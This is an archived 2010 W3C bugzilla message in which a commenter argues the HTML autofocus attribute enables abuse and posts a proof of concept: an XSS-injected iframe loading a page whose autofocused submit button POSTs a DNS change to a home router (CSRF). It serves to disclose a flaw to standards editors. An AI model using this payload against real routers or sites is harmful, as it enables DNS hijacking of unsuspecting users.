[Bug 9602] That autofocus attribute will wreak security havok. What an ignorant idea to bring more logic to HTML. I think I know a couple of ways to abuse it, since it actually is some sort of flow control, which only scripting languages should be capable of. I hope from bugzilla@jessica.w3.org on 2010-04-28 (public-html-bugzilla@w3.org from April 2010)

From: <bugzilla@jessica.w3.org>
Date: Wed, 28 Apr 2010 16:10:38 +0000
To: public-html-bugzilla@w3.org
Message-Id: <E1O79qQ-0005GC-20@jessica.w3.org>

http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602





--- Comment #2 from Skyphire <sasha@scarletred.nl>  2010-04-28 16:11:17 ---
Another PoC utilizes autofocus to bubble focus to the submit button on another
page, and thereby making a CSRF to change a home router DNS settings as
example, can be anything else malicious.

!! Test.html (on trusted server)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>CSRF example</title>
</head>
<body>

<!-- CSRF example injected portion through XSS/Unsanitized database -->
<iframe name="csrf" src="csrf.html" style="position:absolute; top:50; left:90;
z-index:2; height:25px; background-color:magenta;" scrolling="no"></iframe>

</body>
</html>


!! CSRF.html (on untrusted server)

<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Change router DNS settings</title>
</head>
<body>
<form name="logo" method="POST" action="http://192.168.1.2/">
<input type="text" name="log">
<input type="hidden" name="DNS" value="255.255.255.255">
<input type="submit" name="submit" value="submit" autofocus> <!-- setting
autofocus on SUBMIT; Bad idea... -->
</form>
</body>
</html>

-Skyphire

-- 
Configure bugmail: http://www.w3.org/Bugs/Public/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the QA contact for the bug.

Received on Wednesday, 28 April 2010 16:11:19 UTC